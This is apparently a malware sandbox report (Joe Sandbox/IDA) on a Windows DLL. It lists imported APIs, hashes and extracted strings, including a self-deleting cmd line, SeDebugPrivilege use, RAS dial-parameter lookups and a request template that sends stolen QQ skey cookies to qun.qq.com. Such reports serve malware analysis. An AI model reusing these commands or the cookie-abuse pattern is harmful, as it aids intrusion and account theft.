                                                            • Part of subcall function 10005A50: GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                            • Part of subcall function 10005A50: wsprintfA.USER32 ref: 10005B17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#825$wsprintf$#823FolderPathSpecialstrchr
                                                          • String ID: $ $ $%s\%s$.$.$C$C$D$D$Device$DialParamsUID$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetVersionExA$GetWindowsDirectoryA$KERNEL32.dll$M$M$N$N$PhoneNumber$S$a$a$a$a$a$a$b$b$b$b$c$c$c$c$c$c$d$e$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$i$i$i$k$k$k$k$k$k$kernel32.dll$lstrcatA$lstrcmpA$lstrcpyA$lstrlenA$m$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$s$s$s$s$s$u$w$w
                                                          • API String ID: 2391671045-4160613188
                                                          • Opcode ID: eca479f0cba930ca087138913895d5de84e08072406ba3e1e92d2a47810035d3
                                                          • Instruction ID: ae3809650b471314dde33fff758c838472e2731737b5b0f95b3dee6920cb3e1a
                                                          • Opcode Fuzzy Hash: eca479f0cba930ca087138913895d5de84e08072406ba3e1e92d2a47810035d3
                                                          • Instruction Fuzzy Hash: 77120A6150D3C4DEE322CB788848B9BBFD5AFE6748F08494DE1C847292C6BA9548C777
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005461
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000546A
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005478
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000547B
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 1000548E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005491
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 100054A1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100054A4
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 100054B7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100054BA
                                                          • strchr.MSVCRT ref: 100057B9
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 100057F6
                                                          • wsprintfA.USER32 ref: 10005816
                                                          • #823.MFC42(00001000), ref: 1000583D
                                                          • #825.MFC42(00000000), ref: 1000589B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#823#825FolderPathSpecialstrchrwsprintf
                                                          • String ID: $ $ $%s\%s$.$.$C$C$D$D$GetPrivateProfileSectionNamesA$GetWindowsDirectoryA$KERNEL32.dll$M$M$N$N$S$a$a$a$a$a$a$b$b$b$b$c$c$c$c$c$c$d$e$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$i$i$i$k$k$k$k$k$k$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$m$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$s$s$s$s$s$u$w$w
                                                          • API String ID: 1413152188-1163569440
                                                          • Opcode ID: 6b0de1d9b4d272058180ea5e85739ea82220ea56e8af9adbbb86897ae75e66d6
                                                          • Instruction ID: 0562570b42432492150a784315d896445768f268a1e3393a75b37121b429ab9d
                                                          • Opcode Fuzzy Hash: 6b0de1d9b4d272058180ea5e85739ea82220ea56e8af9adbbb86897ae75e66d6
                                                          • Instruction Fuzzy Hash: E4D1B26140D7C0DDE322C778849878BBFD66FA2748F08498DE1C84B293C6BA9658C777
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID: .$.$.$.$:$A$AOr$C$E$F$H$I$I$I$I$I$I$I$O$O$R$T$U$W$a$a$a$a$at.$b$c$d$d$d$g$i$i$i$l$l$l$l$l$l$l$l$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$p$p$p$p$p$p$p$r$r$r$r$r$t$t$t$t$t$t$t$t$t$t$t$t$t$t
                                                          • API String ID: 310444273-3809768815
                                                          • Opcode ID: 63e450fb999bb24abaee570fbd4232a6528e175d703855afcbb30a5378cb40b5
                                                          • Instruction ID: 4c56c63e57b0a57d431be2d6ff2093808df29b32732bb1a27d8720569643267d
                                                          • Opcode Fuzzy Hash: 63e450fb999bb24abaee570fbd4232a6528e175d703855afcbb30a5378cb40b5
                                                          • Instruction Fuzzy Hash: E9E1E42150D3C0DDE332C238844879FBFD65BA2648F48499DE5C84B293C7BA9558D77B
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001ED7E
                                                          • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 1001EDBD
                                                          • GetCurrentProcess.KERNEL32 ref: 1001EEEB
                                                          • GetCurrentThread.KERNEL32 ref: 1001EEF2
                                                          • GetCurrentProcess.KERNEL32(00000020), ref: 1001EF67
                                                          • GetCurrentThread.KERNEL32 ref: 1001EF6E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Current$ModuleProcessThread$AddressEnvironmentFileHandleLibraryLoadNameProcVariable
                                                          • String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$.$2$3$A$A$A$A$COMSPEC$D$F$K$L$N$P$P$R$R$S$T$T$a$a$a$b$c$d$d$d$h$h$i$i$i$i$l$l$l$m$m$o$o$r$r$r$r$r$r$r$s$s$s$s$s$s$t$t$t$t$t$t$t$u$u$y
                                                          • API String ID: 2038349478-1119942076
                                                          • Opcode ID: 9915d721cbc08ed20232ab1e04122bf0686c4f9762ecac8d42deb7a8b580a221
                                                          • Instruction ID: 9d52926fe4a0eaf1950449977c8f4f705b15f5448a49f3a95a1c5d791cb7a6bf
                                                          • Opcode Fuzzy Hash: 9915d721cbc08ed20232ab1e04122bf0686c4f9762ecac8d42deb7a8b580a221
                                                          • Instruction Fuzzy Hash: 6FE12A2150C7C089E326C6788449B9FFFD56BE2748F084A5DE2D84B2D2CAFA9548C777
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 10024C06
                                                          • WTSEnumerateSessionsA.WTSAPI32 ref: 10024C3B
                                                          • GetVersionExA.KERNEL32(?), ref: 10024C53
                                                            • Part of subcall function 10024A90: WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
                                                            • Part of subcall function 10024A50: WTSQuerySessionInformationA.WTSAPI32(00000000,?,0000000A,?,?,10024ED1,?,?,?), ref: 10024A6F
                                                            • Part of subcall function 10024B40: WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                            • Part of subcall function 10024B40: WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F03
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F25
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F31
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F3A
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F46
                                                          • LocalSize.KERNEL32(00000000), ref: 10024F54
                                                          • LocalReAlloc.KERNEL32(00000000,00000000,00000042,?,?,?,?), ref: 10024F62
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F73
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F91
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FA7
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FCF
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FE5
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10025006
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002501C
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002503D
                                                          • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 100250A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Local$AllocInformationQuerySession$Process$CurrentEnumerateFreeMemoryOpenSessionsSizeTokenVersion
                                                          • String ID: AtR$C$C$D$D$I$I$LoSvAtR$Q$RDI$SeDebugPrivilege$SvAtR$c$c$c$c$d$d$d$i$i$i$l$n$n$n$n$n$n$n$n$o$o$o$o$r$s$t$t$t$t$u$v$w$w$y
                                                          • API String ID: 3275454331-1820797497
                                                          • Opcode ID: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                          • Instruction ID: b1de97bb1e532192dcc96ff274dd48cc58c084c44de882cac167928afb279602
                                                          • Opcode Fuzzy Hash: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                          • Instruction Fuzzy Hash: 83E1053050C3C1CEE325CB28C484B9FBBE1AB96708F48495DE5C857352DBBA9909CB67
                                                          APIs
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exec
                                                          • String ID: &$&$&$&$/$/$1$2$3$4$5$6$:$a$a$a$a$a$c$c$d$d$d$g$g$g$g$i$i$i$l$l$m$n$n$n$n$o$o$o$p$r$r$r$r$r$u$u$u$u$u$u$v$y
                                                          • API String ID: 459137531-3041118241
                                                          • Opcode ID: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                          • Instruction ID: 7bc06bb267aba25a745494efeaf4f4d644bd4b710169c1d4aeb2a62eee067a6f
                                                          • Opcode Fuzzy Hash: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                          • Instruction Fuzzy Hash: 08510C2554E3C1DDE312C668918878FEFD21FB7648E48598DB1C81B393C2AA825CC777
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1000FC8C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000FC95
                                                          • LoadLibraryA.KERNEL32(?,.23L), ref: 1000FCDE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000FCE1
                                                          • GetTickCount.KERNEL32 ref: 1000FD3E
                                                          • sprintf.MSVCRT ref: 1000FD4F
                                                          • GetTickCount.KERNEL32 ref: 1000FD8C
                                                          • sprintf.MSVCRT ref: 1000FD9D
                                                          • lstrcatA.KERNEL32(?,?), ref: 1000FDB3
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000FE19
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000FE20
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCountLibraryLoadProcTicksprintf$CloseFileHandleWritelstrcat
                                                          • String ID: .$.23L$2$3$A$A$C$F$G$K$L$N$P$P$R$T$a$a$d$e$e$e$e$e$e$g$h$i$igu$m$n$o$p$p$r$s$t$t$t$u
                                                          • API String ID: 3729143920-1829843242
                                                          • Opcode ID: e4f6fa49615fa3bf4a5896043488c5a6305fc76200abcc925ed36e56fb71271d
                                                          • Instruction ID: 4d7b8e1089b806f1553af91cc52290c17ddbfb9f59a257a9258129450cc3dc3d
                                                          • Opcode Fuzzy Hash: e4f6fa49615fa3bf4a5896043488c5a6305fc76200abcc925ed36e56fb71271d
                                                          • Instruction Fuzzy Hash: FC916C3110C3C09AE312CB68D848B9BBFD5ABA6718F084A5DF6D4462D2D7BA950CC773
                                                          APIs
                                                          • strstr.MSVCRT ref: 10013BB7
                                                          • strstr.MSVCRT ref: 10013BCA
                                                          • strstr.MSVCRT ref: 10013BDF
                                                          • strncpy.MSVCRT ref: 10013C2B
                                                          • _itoa.MSVCRT ref: 10013C71
                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10013C8A
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 10013CB0
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013CBD
                                                          • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013CED
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D00
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D03
                                                          • sprintf.MSVCRT ref: 10013D2E
                                                          • HttpSendRequestA.WININET(00000000,?,?,?), ref: 10013D66
                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 10013D82
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D93
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D96
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013D99
                                                          • atol.MSVCRT ref: 10013DB2
                                                          • #823.MFC42(00000001,?,?), ref: 10013DC0
                                                          • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013DE8
                                                          • #825.MFC42(00000000), ref: 10013DF3
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E02
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E05
                                                          • InternetCloseHandle.WININET(?), ref: 10013E0C
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E24
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013E27
                                                          • InternetCloseHandle.WININET(?), ref: 10013E2E
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E3E
                                                          • #823.MFC42(00000002), ref: 10013E4B
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E75
                                                          • #825.MFC42(00000000), ref: 10013E7C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013E93
                                                          • #823.MFC42(00000001), ref: 10013E9F
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013ECA
                                                          • #825.MFC42(00000000), ref: 10013ED1
                                                          • #825.MFC42(00000000,00000000,00000000), ref: 10013EDF
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                          • String ID: $/cgi-bin/qun_mgr/get_group_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$create$gc=%u&st=0&end=1999&sort=0&%s$gmr$join$p_skey$qun.qq.com$skey=
                                                          • API String ID: 3684279964-3639289013
                                                          • Opcode ID: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                          • Instruction ID: faa93913a6112bf75685c4331b660b6eedd4284dd9d5a7e5e4bfb64d0fa1d1b7
                                                          • Opcode Fuzzy Hash: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                          • Instruction Fuzzy Hash: 97D14876A043142BE310DA689C81FAB77DDEB84760F05463DFB09A72C1EB74ED0587A6
                                                          APIs
                                                          • #356.MFC42 ref: 10007AA2
                                                          • #540.MFC42 ref: 10007AB6
                                                          • #540.MFC42 ref: 10007AC7
                                                          • #540.MFC42 ref: 10007AD8
                                                          • #540.MFC42 ref: 10007AE9
                                                            • Part of subcall function 10008080: #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                            • Part of subcall function 10008080: #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                            • Part of subcall function 10008080: #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                            • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                            • Part of subcall function 10011E20: #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                            • Part of subcall function 10011E20: #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                            • Part of subcall function 10011E20: #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                            • Part of subcall function 10011E20: #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                          • #858.MFC42 ref: 10007B2F
                                                          • #800.MFC42 ref: 10007B40
                                                          • #537.MFC42(*.*), ref: 10007B59
                                                          • #922.MFC42(?,?,00000000,*.*), ref: 10007B6E
                                                          • #858.MFC42(00000000,?,?,00000000,*.*), ref: 10007B80
                                                          • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007B90
                                                          • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007BA1
                                                          • #2770.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BB1
                                                          • #2781.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BCF
                                                          • #4058.MFC42 ref: 10007BEF
                                                          • #858.MFC42(?), ref: 10007C01
                                                          • #858.MFC42(?,?), ref: 10007C0E
                                                          • #858.MFC42(?,?,?), ref: 10007C1B
                                                          • #3178.MFC42(?,?,?,?), ref: 10007C8A
                                                          • #922.MFC42(?,?,00000000,?,?,?,?), ref: 10007C9D
                                                          • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CAF
                                                          • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CBF
                                                          • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CD0
                                                          • #1980.MFC42 ref: 10007CED
                                                          • #858.MFC42(?), ref: 10007CF6
                                                          • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007D1E
                                                          • #922.MFC42(?,?,?), ref: 10007D2E
                                                          • #858.MFC42(00000000,?,?,?), ref: 10007D40
                                                          • #800.MFC42(00000000,?,?,?), ref: 10007D51
                                                          • #2770.MFC42(?,00000000,00000000,?,?,?), ref: 10007D61
                                                          • #2781.MFC42(?,00000000,00000000,?,?,?), ref: 10007D7F
                                                          • #4058.MFC42(?,00000000,00000000,?,?,?), ref: 10007D8C
                                                          • #4215.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007DAD
                                                          • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DC6
                                                          • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DE7
                                                          • #3310.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E22
                                                          • #3010.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E7F
                                                          • #3304.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007ED4
                                                          • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F33
                                                          • #800.MFC42(?,?,?,?,00000000,00000000,?,?,?), ref: 10007F58
                                                          • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F6A
                                                          • #941.MFC42(100FA614), ref: 10007F91
                                                          • #6883.MFC42(?,?), ref: 10007FA2
                                                          • #800.MFC42(?,?), ref: 10007FB3
                                                          • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007FE1
                                                          • #800.MFC42 ref: 10008015
                                                          • #800.MFC42 ref: 10008026
                                                          • #800.MFC42 ref: 10008037
                                                          • #800.MFC42 ref: 10008048
                                                          • #668.MFC42 ref: 1000805C
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #800$#858$#3811$#540$#922$#2770#2781#3181#3324#4058#537Message$#1980#2614#3010#3178#3304#3310#356#4215#535#668#6883#860#940#941
                                                          • String ID: *.*$warning
                                                          • API String ID: 3130606840-3923866357
                                                          • Opcode ID: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                          • Instruction ID: b1e61bf16f4b2c14380c5a5ce74a3a62fa832d31a0b46feb69f6aa117d284303
                                                          • Opcode Fuzzy Hash: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                          • Instruction Fuzzy Hash: 42027F745083858BD354CF64C941FABBBE5FF98684F40492CF9DA43296EB34E909CB62
                                                          APIs
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$Eventfreemalloc
                                                          • String ID: .$0$2$3$A$A$C$D$G$K$L$N$P$P$R$S$T$W$\$a$a$a$c$d$f$h$i$l$l$l$m$n$o$p$t$t$t$t$t$u
                                                          • API String ID: 4197004350-898277365
                                                          • Opcode ID: 6844fd1aae96d6a728b9026d4df18c1478f85e5378cfbf6268743b6022a5aa55
                                                          • Instruction ID: cbdbaa2f1d889cd97fb3dca5bd1ca770dde78bd32e1b100a85a0a9dad76a714e
                                                          • Opcode Fuzzy Hash: 6844fd1aae96d6a728b9026d4df18c1478f85e5378cfbf6268743b6022a5aa55
                                                          • Instruction Fuzzy Hash: FC61596110C3C0DDE312D7A89848B8BBFD59BE6308F08499DF5C84B292C2BA921CC777
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 10021B6B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021B78
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 10021B8C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021B8F
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 10021BDB
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021BDE
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,esolC), ref: 10021C52
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021C55
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateProcess), ref: 10021C65
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021C68
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,DisconnectNamedPipe), ref: 10021C78
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021C7B
                                                          • Sleep.KERNEL32(0000000A), ref: 10021C92
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10021CB2
                                                          • #823.MFC42 ref: 10021CC3
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 10021CD3
                                                          • GetCurrentProcessId.KERNEL32 ref: 10021CE7
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10021CFE
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 10021D09
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021D10
                                                          • #825.MFC42(00000000), ref: 10021D29
                                                          • FreeConsole.KERNEL32 ref: 10021D3B
                                                          • Sleep.KERNEL32(0000000A), ref: 10021D43
                                                          • FreeConsole.KERNEL32 ref: 10021D49
                                                          Strings
                                                          Memory Dump Source
